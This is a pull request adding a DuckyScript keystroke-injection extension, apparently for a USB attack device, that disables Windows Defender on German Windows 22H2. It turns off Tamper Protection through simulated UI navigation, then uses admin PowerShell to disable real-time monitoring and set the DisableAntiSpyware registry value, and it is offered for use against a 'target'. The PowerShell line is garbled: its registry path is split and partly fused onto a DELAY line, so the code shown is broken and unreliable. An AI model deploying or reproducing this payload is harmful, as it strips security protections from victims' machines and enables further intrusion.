### PR TITLE
An Extension to Disable Defender on German Windows 22H2

### DIFF
--- a/payloads/extensions/KillDefender.txt
+++ b/payloads/extensions/KillDefender.txt
@@ -1,0 +1,44 @@
+EXTENSION KILLDEFENDER
+          REM VERSION 1.0
+          REM Author HackingMark
+          REM Disables Tampering Protection and Kills Windows Defender on Win 22H2
+          REM Tested on German Computers
+          REM Uncomment KILL() at the end to use it within the Extension or call it later in your Payload.
+ATTACKMODE HID
+DELAY 2000
+    FUNCTION KILL()
+        GUI s
+        DELAY 500
+        STRINGLN Windows-Sicherheit
+REM Add your Term for Windows-Securitycenter above if your Target is not German.
+        DELAY 500
+        ENTER
+        TAB
+        TAB
+        TAB
+        TAB
+        ENTER
+        DELAY 500
+        TAB
+        TAB
+        TAB
+        TAB
+        SPACE
+        DELAY 500
+        ALT j
+        DELAY 500
+        ALT F4
+        DELAY 1500
+        GUI x
+        DELAY 100
+        STRING a
+        DELAY 500
+        ALT j
+        DELAY 500t\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; exit;
+        STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsof
+    END_FUNCTION
+REM KILL()
+END_EXTENSION
+
+
+


### PR DESCRIPTION
This extension kills Windows Defender via Powershell after deactivating Tampering Protection. Written and tested on German Computers. For international Use just follow the Instructions inside the extension, e.G. replacing the Term for Windows Securitycenter in your Targetlanguage.